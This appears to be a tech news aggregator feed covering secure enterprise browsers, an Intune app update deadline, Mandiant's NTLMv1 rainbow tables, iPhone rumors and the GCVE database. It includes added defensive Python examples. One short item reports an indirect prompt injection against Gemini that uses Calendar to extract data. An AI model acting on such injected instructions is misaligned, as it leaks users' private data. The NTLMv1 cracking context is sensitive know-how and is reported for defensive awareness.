Silo offers two different client downloads: Windows and Mac thick clients and a thin client. Both can be managed centrally and via an API connection, all of which kick off Linux-based sessions. While the vendor did not reveal pricing specifics, two plans are available: on a per user or per hourly consumption basis. It also provides custom browsers based on a customer’s API collection.
Ermes Browser Security offers a variety of security features including phishing protection, cybersquatting, extension monitoring, and URL filtering. It uses a browser extension and has separate mobile apps.
Fortinet acquired Perception Point’s secure browser extension and integrated it into its product, Fortinet Remote Browser Isolation. It integrates with other protective features such as securing cloud apps and gives any browser real-time protection, along with other dynamic security features, through a browser extension. The product is sold with various quantity discounts, with typical pricing at $55/user/year.
Google’s own enterprise product uses Chrome Enterprise Core as its foundation, which is also the free version. The Premium version adds most of its protective features. Both versions have a very complex setup to enable their managed browser service; part of the complexity is that it has numerous fine-grained security controls, such as numerous steps to add encryption, as well as specialized OS-specific installation such as mobile management software with more than a dozen steps. The other products make this a bit easier, but there is still a lot of trial and error with Google’s software to ensure that the security isn’t blocking legitimate browsing uses, sites, or corporate applications. It is available for all Google Workspace customers and will cost an additional $72/user/year, with a free 30-day trial period that includes 50 user licenses.
Island’s enterprise browser comes both as a browser extension and a thick replacement client for Linux, Windows, Mac, Android, iOS and Chromebooks. It has extensions for Chrome, Edge, Safari and Firefox. It has robust network management and protective functions to complement its browser security.
LayerX Security enterprise browser has both an extension and a thick browser client which integrates with a number of identity protection platforms and offers extension monitoring, DLP, traffic filtering and other features.
Mammoth acquired Appaegis’ secure browser and offers a thick managed client that includes browser session recording, copy-paste blocking, watermarking, screen-share prevention, and data masking. It supports Windows, Mac, iOS and Android devices. The Android version is the most recent and doesn’t have complete feature parity with the other OS versions.
ManageEngine Browser Security Plus is a thick Windows and Mac browser called Ulaa. It comes in a free edition for up to 25 computers and professional edition with additional security features, including DLP, threat prevention, web filtering and phishing protection.
Menlo Security Secure Enterprise Browser is a cloud-based software part of a collection of other products that offer file security, ZTNA and other protective features.
Palo Alto Networks Prisma Access Browser is the result of the acquisition of Talon’s browser technology and offers thick clients for Windows, Mac, Linux, Android and iOS as well as browser extensions. It uses a cloud-based management service from Strata. It has a full managed feature set that includes data loss prevention features, extensive logging, and plenty of policies and rule sets. Like some of the others, you can set up a main login like an SSO tool to launch your apps. It will examine the endpoint posture to ensure that it is running the latest OS version and identify risky browser extensions or restricted URLs that you can specify. It comes with a detailed implementation guide, and existing Prisma platform customers are eligible for free browser licenses.
Seraphic Enterprise Browser Security has a unique mode of operations with an agent that works on top of the browser’s JavaScript engine. It supports both managed and unmanaged browsers including generative AI-based Atlas and works with a series of protective modules including ZTNA, DLP, traffic filtering, remote connection management, identity security and other security features. There are also thick clients for both Android and iOS devices. It has competitive per-user pricing (each user can install on up to four devices) with quantity discounts.
Surf Security Zero Trust Enterprise Browser offers both a thick browser replacement client and browser extension with a variety of protective features, including DLP and ZTNA support, and integration into Okta’s SSO platform.
SquareX Enterprise offers a browser extension that includes DLP, generative AI protection and threat hunting features, and can isolate and remove malicious code. It supports the three major desktop OSs and major browser vendors, including AI-based browsers from Perplexity and Atlas. It integrates with various identity, SIEM and SSO providers and supports Okta’s Shared Signal Framework.
View the full article
Enterprises using Intune mobile application management (MAM) beware: Your apps won’t run soon if you haven’t planned ahead.
Microsoft is updating its Intune MAM to support new security requirements starting January 19 or “soon after”, requiring that all iOS-wrapped apps, iOS SDK-integrated apps, and the Intune Company Portal for Android be updated to the latest Intune versions to keep them secure and running.
This means that enterprises that haven’t updated to the latest versions will be blocked from launching their apps altogether. And this may not just include custom apps wrapped with Intune MAM, but other frequently used ones such as Outlook and Teams.
Simply put, “If you want your stuff to work, get it updated and pushed,” said David Shipley of Beauceron Security.
What’s being updated in iOS, Android
Microsoft Intune is a core component of the Microsoft Modern Workplace. Its MAM features help enterprises secure their data on both corporate and personal devices. Using it, IT teams can manage corporate apps like Outlook or Teams without having to manage the entire device. This type of unified endpoint management (UEM) supports feature deployments, updates, and retirement of apps, while also protecting corporate data and preventing data leaks, with (ideally) minimal disruption for the user.
With Monday’s hard deadline, Microsoft will enforce stricter security requirements within the UEM — but only for approved users. Those whose Microsoft or third-party apps lack the latest app protection support will “be blocked from launching their apps,” the company warned. Microsoft announced the required updates several months ago in the Microsoft 365 Admin Center.
For Apple users, Monday’s full stop means:
iOS line-of-business (LOB) and custom iOS apps using the Intune App SDK must update to SDK version 20.8.0 or later for apps compiled with Xcode 16, and to 21.1.0 or later for apps compiled with Xcode 26. Apps using the wrapper must update to the new version of the Intune App Wrapping Tool for iOS: version 20.8.1 or later for apps built with Xcode 16, and version 21.1.0 or later for apps built with Xcode 26.
It’s a little simpler for Android users: once one Microsoft app with an updated SDK is on the device and the Company Portal is updated to version 5.0.6726.0 or later, other Android apps will update.
Tenants with policies targeted to both iOS and Android apps should notify their users that they need to update, and ensure Microsoft apps such as Teams and Outlook are up to date, Microsoft advised. Admins can also enable conditional launch settings to block apps using older versions of the SDK or to warn users if they are using older versions of apps.
Admins can also proactively ensure that users are not blocked while doing work on their phones. In the Microsoft Intune admin center, they can navigate to Apps > Monitor > App protection status to review the app and SDK versions users are running.
“We recommend to always update your Android and iOS apps to the latest SDK or app wrapper to ensure that your app continues to run smoothly,” Microsoft emphasized.
Overall, the company advised enterprises to use conditional access policies so that only apps with app protection policies enabled can access corporate resources.
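The version gate described above can be checked before the deadline rather than discovered by blocked users. The following is an added example, not Microsoft's code: it takes records shaped like the rows an admin would read from Apps > Monitor > App protection status and flags every app whose SDK, wrapper or Company Portal version is below the minimums quoted in the article. The record field names, the way the Xcode toolchain is recorded, and the sample rows are all constructed assumptions.

```python
"""Added example (not Microsoft's code): flag Intune MAM app records that fall
below the minimum Intune App SDK, App Wrapping Tool and Company Portal versions
the article cites. Field names and sample rows are constructed assumptions."""

from dataclasses import dataclass
from typing import List, Optional, Tuple

# Minimum versions named in the article, keyed by
# (platform, integration type, toolchain).
MINIMUM_VERSIONS = {
    ("ios", "sdk", "xcode16"): "20.8.0",
    ("ios", "sdk", "xcode26"): "21.1.0",
    ("ios", "wrapper", "xcode16"): "20.8.1",
    ("ios", "wrapper", "xcode26"): "21.1.0",
    ("android", "company_portal", None): "5.0.6726.0",
}


def version_key(version: str, width: int = 4) -> Tuple[int, ...]:
    """Turn '20.8' into (20, 8, 0, 0) so dotted versions compare numerically.
    A plain string comparison would rank '20.10.0' below '20.8.0'."""
    parts = [int(p) for p in version.strip().split(".")]
    return tuple(parts + [0] * (width - len(parts)))


@dataclass
class AppProtectionRecord:
    user: str
    app: str
    platform: str             # "ios" or "android"
    integration: str          # "sdk", "wrapper" or "company_portal"
    toolchain: Optional[str]  # "xcode16", "xcode26" or None for Android
    version: str              # SDK / wrapper / Company Portal version reported


def evaluate(record: AppProtectionRecord) -> Tuple[bool, str]:
    """Return (meets_minimum, explanation) for one record."""
    key = (record.platform, record.integration, record.toolchain)
    minimum = MINIMUM_VERSIONS.get(key)
    if minimum is None:
        # Unknown combination: do not silently pass it, ask for a manual look.
        return False, f"no minimum version known for {key}; review manually"
    ok = version_key(record.version) >= version_key(minimum)
    op = ">=" if ok else "<"
    return ok, f"{record.version} {op} {minimum}"


def blocked_records(records: List[AppProtectionRecord]) -> List[Tuple[str, str, str]]:
    """List (user, app, explanation) for every record that would be blocked."""
    out = []
    for r in records:
        ok, why = evaluate(r)
        if not ok:
            out.append((r.user, r.app, why))
    return out


# Constructed sample rows (not real tenant data).
SAMPLE_RECORDS = [
    AppProtectionRecord("alice@example.com", "FieldOps", "ios", "sdk", "xcode16", "20.7.2"),
    AppProtectionRecord("bob@example.com", "FieldOps", "ios", "sdk", "xcode26", "21.1.0"),
    AppProtectionRecord("carol@example.com", "Expenses", "ios", "wrapper", "xcode16", "20.8.1"),
    AppProtectionRecord("dave@example.com", "Expenses", "ios", "wrapper", "xcode26", "20.8.1"),
    AppProtectionRecord("erin@example.com", "Company Portal", "android", "company_portal", None, "5.0.6700.0"),
    AppProtectionRecord("frank@example.com", "Company Portal", "android", "company_portal", None, "5.0.6726.0"),
]

if __name__ == "__main__":
    for user, app, why in blocked_records(SAMPLE_RECORDS):
        print(f"BLOCKED {user} {app}: {why}")
```

Note that the wrapper build for Xcode 26 is held to 21.1.0, so a wrapped app that is current for Xcode 16 (20.8.1) is still flagged once it is rebuilt with Xcode 26; the check is keyed on the toolchain for that reason.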
Supporting new security tools (and why enterprises should have updated yesterday)
With its new security updates, Microsoft has wrapped controls around existing custom apps that businesses have built, Beauceron’s Shipley explained. These enable features such as requiring a PIN or biometric authentication inside the app, restricting data sharing with other managed apps, and selectively wiping corporate data from apps.
“This [update] may be because there’s some risk with the older versions not doing what they should’ve been doing for protections,” Shipley noted.
He pointed out that Microsoft has been signaling this update since 2025 and already pushed back implementation from mid-December 2025 to this week. Also, it’s interesting to note that this change may not just impact custom apps wrapped in Intune MAM, but Outlook, Teams, and other applications as well.
“The long and short of it is, what Redmond wants is what Redmond gets when it finally puts a foot down, like it appears to have in this case,” said Shipley.
This deadline shouldn’t come as a surprise to IT teams who stayed on top of things, noted Fritz Jean-Louis, principal cybersecurity advisor at Info-Tech Research Group. Microsoft has been deprecating various parts of Intune, and how it connects from an infrastructure perspective, for some time now.
“Like many other things, if you’re not actively managing [with] the right amount of due diligence, you will be impacted by this,” said Jean-Louis, noting that employees dealing with work tasks on their phones (either remotely or on-premises) will experience outages without the updates. “It’s going to seriously impact users if this has not been adequately addressed.”
From an IT perspective, admins who are not ready for the new versioning should contact Microsoft as soon as possible and determine whether mitigations can be put in place until their team is ready.
If users experience issues, they should contact their official IT service desk, Jean-Louis advised. They should not attempt to self-resolve by, say, going to a random site and blindly entering a user ID and password to receive updates. Threat actors may be lying in wait, using this type of opportunity to deploy malware “fixes.”
“Threat actors are always looking for this sort of major change to take advantage,” he noted.
This article originally appeared on Computerworld.
View the full article
Google’s Mandiant security division has come up with an unusual tactic to persuade organizations to stop using the aged and hugely insecure NTLMv1 authentication protocol: publish a data lookup that makes cracking NTLMv1 credentials trivial for attackers.
The intention, Mandiant explained, is to draw attention to the fact that, despite decades of evidence that NTLMv1 (NT LAN Manager version 1) is insecure, organizations continue to use it. Anyone can use Mandiant’s Net-NTLMv1 pre-computed rainbow table lookup, downloadable from the Google Cloud Research Dataset portal, to map a given server response to reconstruct a real NT hash.
Hashes, of course, are mathematical representations of real passwords, but they are just as useful to criminals when exploited using techniques such as pass-the-hash. The benefit is time and money saved: Mandiant reckons its rainbow table allows the recovery of an NTLMv1 key in 12 hours using a computer costing $600, rather than relying on third-party services or expensive hardware to brute-force the keys.
None of this makes NTLMv1 less secure or easier to target than it already is. Mandiant’s hope is that the release of the table will serve as a reminder that the problem exists, prompting organizations to finally rip out NTLMv1 from their networks.
“This legacy protocol leaves organizations vulnerable to trivial credential theft, yet it remains prevalent due to inertia and a lack of demonstrated immediate risk,” the company said in its announcement. “By releasing these tables, Mandiant aims to lower the barrier for security professionals to demonstrate the insecurity of Net-NTLMv1.”
Long fallback
NTLMv1 is a 1990s challenge-response protocol used to authenticate Windows NT users to Active Directory (AD). Based on 1980s Data Encryption Standard (DES) encryption, it was updated to the more secure NTLMv2 in 1996 before being completely replaced by Kerberos. Unfortunately, legacy protocols like NTLMv1 don’t just disappear; they are retained as a fallback in case they are needed by older applications. That fallback has turned out to last decades.
What evidence does Mandiant have that organizations are still using NTLMv1? The first is anecdotal: “Mandiant consultants continue to identify its use in active environments,” the company noted in last week’s announcement.
Secondly, cyberattackers regularly target it. For example, a 2024 campaign by the TA577 threat group targeted NTLM hashes by using booby-trapped emails to send challenge-response authentication requests to internal SMB resources such as legacy printers.  
A more recent incident involved an authentication relay attack aimed at a specific NTLM vulnerability, CVE-2025-54918, which came only weeks after Microsoft announced that it was finally removing NTLMv1 support from Windows Server 2025 and Windows 11.
Primary hurdle: Knowing it’s still there
According to Rob Finn, international vice president at supply chain security company Chainguard, even security-aware organizations could be caught out by NTLMv1.
“Legacy protocols like NTLMv1 are buried deep within third-party firmware. A security team might deprecate NTLMv1 at the OS level, only to have a legacy printer driver or industrial sensor reintroduce it via an unpatched, decades-old library,” he said. “For most companies, the primary hurdle isn’t just knowing NTLMv1 is insecure, it’s knowing that it’s still there.”
Because resources such as printers are not externally exposed, it is tempting to assume they are beyond the reach of attackers. Despite this, NTLMv1 can still be targeted from outside the network using relay or coercion techniques, by, for example, triggering authentication via a phishing attack.
“Attackers don’t need to know you’re using it. They just have to poke the system to find out. Fundamentally, organizations keep legacy protocols active not because they want to, but because they fear breaking a mission-critical legacy app,” said Finn.
Despite Microsoft recommending that organizations upgrade to NTLMv2 and Kerberos for more than two decades, it appears not everyone got the memo. “In crypto terms, NTLMv1 isn’t just old, it’s archaeological,” said Rob Anderson, head of reactive consulting services at Reliance Cyber. “NTLMv1 is still enabled, not because it is needed today, but because it was needed once, and nobody is quite brave enough to turn it off and see what breaks.”
Despite those fears, organizations need to take action. “Scan for its use, find out why it is in use, register it as a high risk and get to work removing it, with achievable deadlines,” he advised.
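The first step Anderson describes, scanning for NTLMv1 use, can be done from logs the domain already produces. The following is an added example, not Mandiant's, Microsoft's or any vendor's code: it parses the text of Windows Security event 4624 (successful logon), in which the "Authentication Package" and "Package Name (NTLM only)" fields distinguish NTLM V1 and LM logons from NTLM V2 and Kerberos, and builds an inventory of the source addresses, workstations and accounts still authenticating with the legacy variants. The three events are constructed; the field names follow the 4624 message body, but the hosts, accounts and addresses are made up.

```python
"""Added example (not Mandiant's or Microsoft's code): inventory NTLMv1 and LM
logons from Windows Security event 4624 text so that legacy callers can be
identified and retired before the protocol is switched off."""

import re
from collections import defaultdict
from typing import Dict, List, Tuple

# Constructed sample: three 4624 events separated by '---'. Field names follow
# the 4624 message body; hosts, accounts and addresses are made up.
SAMPLE_EVENTS = """\
An account was successfully logged on.
Logon Type: 3
Account Name: svc-print
Account Domain: CORP
Workstation Name: PRN-LEGACY-01
Source Network Address: 10.20.30.40
Authentication Package: NTLM
Package Name (NTLM only): NTLM V1
---
An account was successfully logged on.
Logon Type: 3
Account Name: jdoe
Account Domain: CORP
Workstation Name: WS-1234
Source Network Address: 10.20.31.5
Authentication Package: NTLM
Package Name (NTLM only): NTLM V2
---
An account was successfully logged on.
Logon Type: 2
Account Name: jdoe
Account Domain: CORP
Workstation Name: WS-1234
Source Network Address: -
Authentication Package: Kerberos
Package Name (NTLM only): -
"""

FIELD_RE = re.compile(r"^\s*(?P<key>[^:]+?):\s*(?P<value>.*?)\s*$")
# Values 4624 records in "Package Name (NTLM only)" for the legacy variants.
LEGACY_PACKAGES = {"NTLM V1", "LM"}


def parse_events(text: str) -> List[Dict[str, str]]:
    """Split a dump of 4624 events on '---' and parse each 'Key: Value' line."""
    events = []
    for chunk in text.split("---"):
        fields = {}
        for line in chunk.splitlines():
            m = FIELD_RE.match(line)
            if m:
                fields[m.group("key")] = m.group("value")
        if fields:
            events.append(fields)
    return events


def legacy_ntlm_inventory(events: List[Dict[str, str]]) -> Dict[Tuple[str, str], dict]:
    """Group NTLM V1 / LM logons by (source address, workstation) with the
    accounts seen. Kerberos and NTLM V2 logons are ignored."""
    inventory = defaultdict(lambda: {"count": 0, "accounts": set()})
    for ev in events:
        if ev.get("Authentication Package") != "NTLM":
            continue
        if ev.get("Package Name (NTLM only)") not in LEGACY_PACKAGES:
            continue
        key = (ev.get("Source Network Address", "-"), ev.get("Workstation Name", "-"))
        entry = inventory[key]
        entry["count"] += 1
        entry["accounts"].add(f'{ev.get("Account Domain", "")}\\{ev.get("Account Name", "")}')
    return {k: {"count": v["count"], "accounts": sorted(v["accounts"])}
            for k, v in inventory.items()}


if __name__ == "__main__":
    for (source, workstation), info in legacy_ntlm_inventory(parse_events(SAMPLE_EVENTS)).items():
        print(f"{source} ({workstation}): {info['count']} legacy NTLM logon(s) by {', '.join(info['accounts'])}")
```

Run against a real export, the inventory is the list of owners to talk to: each entry is a device or service whose "why is it in use" needs answering before the "Network security: LAN Manager authentication level" policy (the LmCompatibilityLevel setting) can be raised to refuse LM and NTLMv1 responses without breaking something.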
View the full article
While the iPhone 18 Pro and Pro Max are still around eight months away, multiple sources have already commented on how much RAM the devices will have.


In a blog post last year, Apple supply chain analyst Ming-Chi Kuo said that he expected all of the new iPhone models released later this year to be equipped with 12GB of RAM. That would include the iPhone 18 Pro, iPhone 18 Pro Max, and iPhone Fold, and it would match the 12GB of RAM included in the iPhone 17 Pro models.

In a research note last week, obtained by MacRumors, analyst Jeff Pu agreed that the iPhone 18 Pro models and iPhone Fold will have 12GB of LPDDR5 RAM.

It has been rumored that even the standard iPhone 18 will have 12GB of RAM, which would be an increase over the 8GB of RAM in the standard iPhone 17.

Here is how much RAM is in the latest iPhones:
iPhone 17: 8GB
iPhone 17 Pro: 12GB
iPhone 17 Pro Max: 12GB
iPhone Air: 12GB

Here is how much RAM is expected in the next iPhones:
iPhone 18: 12GB
iPhone 18 Pro: 12GB
iPhone 18 Pro Max: 12GB
iPhone Fold: 12GB

Apple is expected to release the iPhone 18 Pro and iPhone 18 Pro Max in September, but the standard iPhone 18 is not expected to be announced until around March 2027, as Apple is reportedly shifting to a new two-phase launch strategy.

For the iPhone 18 Pro's A20 Pro chip, RAM will reportedly be integrated directly onto the chip's wafer with the CPU, GPU, and Neural Engine, rather than being adjacent to the chip and connected with a silicon interposer. This could boost the RAM's performance and efficiency, especially for Apple Intelligence tasks.
This article, "How Much RAM Will the iPhone 18 Pro Have? Here's What Rumors Say" first appeared on MacRumors.com
View the full article
Cybersecurity researchers have disclosed details of a security flaw that leverages indirect prompt injection targeting Google Gemini as a way to bypass authorization guardrails and use Google Calendar as a data extraction mechanism. The vulnerability, Miggo Security's Head of Research, Liad Eliyahu, said, made it possible to circumvent Google Calendar's privacy controls by hiding a dormant
View the full article
As noted by 9to5Mac over the weekend, Walmart still does not accept contactless payment options like Apple Pay at its more than 4,500 stores across the U.S., and there is no indication that will be changing any time soon.


It is not just Apple Pay that is affected. Walmart also does not allow customers to use Google Pay or Samsung Pay, and you cannot tap a credit or debit card either.

It is far from the first time that we have reported on this topic, but Walmart has still not changed course, despite endless customer complaints.

Last year, a Walmart spokesperson told MacRumors that the retailer remained focused on its own payment technologies in the Walmart app, including Walmart Pay and Scan & Go, but these options are not as convenient as one-tap Apple Pay.

To use Walmart Pay, customers must add a payment card to the Walmart app, and then scan a QR code displayed at the checkout to complete payment. This system allows Walmart to track a customer's purchase history and learn their habits, which is likely the biggest underlying reason that the retailer does not accept Apple Pay.

Scan & Go allows Walmart+ members to save time by scanning barcodes on items while they shop, rather than having to scan all of the items at a self-checkout register later. This can save you time, but Apple Pay is still not accepted.

Apple Pay has a lot of privacy protections, including hiding actual credit card numbers, and this would make it harder for Walmart to track customers.

Apple Pay launched more than 10 years ago, and it was accepted at more than 90 percent of U.S. retailers as of 2022, according to Apple. Some other major Apple Pay holdouts in the U.S. have reversed course and started accepting it over the past few years, including The Home Depot, Lowe's, Kroger, and Texas grocery store chain H-E-B, leaving Walmart as one of the country's only major retailers that does not accept Apple Pay.

Interestingly enough, Walmart has accepted Apple Pay in Canada since 2020, but apparently it is not willing to offer that luxury in America for now.
This article, "Walmart Still Doesn't Accept Apple Pay in the U.S. in 2026, Here's Why" first appeared on MacRumors.com
View the full article
While most sources in the Apple rumor scene agree that the iPhone 18 Pro and iPhone 18 Pro Max will feature under-screen Face ID, there continues to be conflicting rumors about how that change might impact the Dynamic Island.


In a post on social media platform X today, the account "ShrimpApplePro" claimed that the Dynamic Island will be "shorter" on the iPhone 18 Pro models, as a result of some Face ID components moving under the screen. Only the front camera and Face ID's infrared camera will remain visible on the devices, they said.

"ShrimpApplePro" has accurately leaked some details about devices like the iPhone 15 Pro and Apple Watch Series 9 in the past, but they are not always correct. Early rumors should always be treated with some skepticism.

Last month, The Information said that the front camera would be moved to the top-left corner of the screen on the iPhone 18 Pro models. The report explicitly said this change would help to eliminate the pill-shaped cutout in the screen, but "ShrimpApplePro" evidently believes that the Dynamic Island will live on in a smaller way.

YouTube channel Front Page Tech mocked up an iPhone 18 Pro with both the front camera and a smaller Dynamic Island in the top-left corner of the screen, but the video might simply be combining the two rumors mentioned above.

While the exact implementation remains to be seen, the good news is that it really does sound like under-screen Face ID is finally happening this year.

South Korean publication ETNews today reported (via "Jukan") that the iPhone 18 Pro models will use under-screen infrared technology from Samsung, which would pave the way for under-screen Face ID. The report also said the devices will use so-called LTPO+ display technology, which would likely be more power efficient than the current LTPO technology in the iPhone 17 series. This upgrade should contribute to longer battery life.

Apple is expected to unveil the iPhone 18 Pro models in September, and hopefully the Face ID and Dynamic Island rumors are more clear by then.
This article, "iPhone 18 Pro: Under-Screen Face ID, LTPO+ Display, Dynamic Island Debate Continues" first appeared on MacRumors.com
View the full article
With db.gcve.eu, the GCVE initiative (Global Cybersecurity Vulnerability Enumeration) now provides a free, publicly accessible database of IT security vulnerabilities. The goal is to end the dependence on US databases and to strengthen digital sovereignty in Europe.
GCVE database aims to make vulnerability reporting easier
The platform brings together information from various public sources. These include the sources of the GCVE Numbering Authority (GNA) model, which replaces the traditional centralized assignment of vulnerability identifiers (CVE IDs). Data from other recognized vulnerability registries is used as well.
The decentralized approach makes it possible to assign and publish vulnerability identifiers autonomously, without having to wait for central approval. More than 25 different data sources are currently integrated. The collected vulnerability data is normalized, structured and made searchable.
In addition, the open API allows seamless integration into existing compliance tools and risk management systems. This is intended to enable security managers, researchers, computer security incident response teams, software vendors and open-source developers to track and evaluate security advisories more efficiently across ecosystems.
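A practical consequence of decentralized assignment is that a tracking tool now meets two identifier families for the same issue. The following is an added example, not code from the GCVE project or the article: it parses CVE and GCVE identifiers, converts between them where that is possible, and deduplicates a mixed list. The identifier layout GCVE-<GNA id>-<year>-<number>, and the assumption that GNA id 0 is reserved for identifiers mirroring CVE records, reflect my reading of the GCVE specification rather than anything the article states; the sample identifiers are constructed apart from CVE-2025-54918, which appears elsewhere on this page.

```python
"""Added example (not GCVE's own code): parse and normalize CVE and GCVE
identifiers so that advisories from different GNAs can be tracked together.
Assumed layout: GCVE-<GNA id>-<year>-<number>, with GNA id 0 mirroring CVE."""

import re
from typing import Dict, Iterable, List, Optional

GCVE_RE = re.compile(r"^GCVE-(?P<gna>\d+)-(?P<year>\d{4})-(?P<number>\d+)$")
CVE_RE = re.compile(r"^CVE-(?P<year>\d{4})-(?P<number>\d{4,})$")
CVE_GNA = 0  # assumption: GNA id 0 is reserved for identifiers that mirror CVE records


def parse_identifier(identifier: str) -> Optional[Dict[str, object]]:
    """Return the parts of a CVE or GCVE identifier, or None if it is neither."""
    ident = identifier.strip().upper()
    m = GCVE_RE.match(ident)
    if m:
        return {"scheme": "GCVE", "gna": int(m["gna"]),
                "year": int(m["year"]), "number": m["number"]}
    m = CVE_RE.match(ident)
    if m:
        return {"scheme": "CVE", "gna": CVE_GNA,
                "year": int(m["year"]), "number": m["number"]}
    return None


def to_gcve(identifier: str) -> str:
    """Canonical GCVE form; a CVE ID maps onto the assumed CVE-mirroring GNA."""
    p = parse_identifier(identifier)
    if p is None:
        raise ValueError(f"not a CVE or GCVE identifier: {identifier!r}")
    return f"GCVE-{p['gna']}-{p['year']}-{p['number']}"


def to_cve(identifier: str) -> Optional[str]:
    """CVE form, or None when the GCVE ID belongs to a GNA other than the CVE one."""
    p = parse_identifier(identifier)
    if p is None or p["gna"] != CVE_GNA:
        return None
    return f"CVE-{p['year']}-{p['number']}"


def dedupe(identifiers: Iterable[str]) -> List[str]:
    """Collapse a mixed list to unique canonical GCVE IDs, preserving order."""
    seen: Dict[str, str] = {}
    for ident in identifiers:
        seen.setdefault(to_gcve(ident), ident)
    return list(seen)


if __name__ == "__main__":
    # Constructed inputs (GCVE-1-2025-0001 is made up for illustration).
    for ident in dedupe(["CVE-2025-54918", "gcve-0-2025-54918", "GCVE-1-2025-0001"]):
        print(ident, "->", to_cve(ident) or "no CVE equivalent")
```

The point of keeping the GNA number in the canonical form is that identifiers from different authorities never collide, while the lossless mapping back to CVE means existing tooling keyed on CVE IDs keeps working for the records that have one.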
View the full article
Apple has updated its homepage to honor Dr. Martin Luther King Jr. today. The page highlights some of King's most impactful quotes, and invites people to explore his legacy further through the Apple Books and Apple Podcasts apps.


Apple shows photos of Dr. King visiting a church in Miami, Florida, holding a news conference in Birmingham, Alabama, and speaking to a crowd in Jackson, Mississippi.

Apple has run a full-page Dr. Martin Luther King Jr. homepage tribute for more than a decade.

"We honor Dr. King and reflect upon his life and legacy," says Apple.

Today is Martin Luther King Jr. Day in the United States. Given it is a federal holiday, the Apple news cycle might be relatively quieter today.
This article, "Apple Honors Dr. Martin Luther King Jr. With Full-Page Website Tribute" first appeared on MacRumors.com
View the full article
Chrome for iOS will soon feature an option for iPhone users to import their Safari data into Google's mobile browser, avoiding the need to perform the transfer on desktop.


Starting in Chrome 145, currently in beta, the new feature will guide users through the process of importing bookmarks, browsing history, and passwords from Safari, since Chrome cannot transfer the data directly because of Apple's privacy rules.

The process involves manually exporting Safari browsing data to a zip file downloaded to the user's iPhone, and then selecting the file in Chrome for import using the new option.

Chrome's interface displays a breakdown of what will be imported and proceeds once the user confirms; the browser then offers to delete the zip file as a privacy measure.

The feature is currently appearing in the latest version of Chrome 145 in TestFlight, so it should begin to roll out with the next stable release.

(Via MacObserver.)
This article, "Google Chrome Is Getting a Safari Data Import Option on iPhone" first appeared on MacRumors.com
View the full article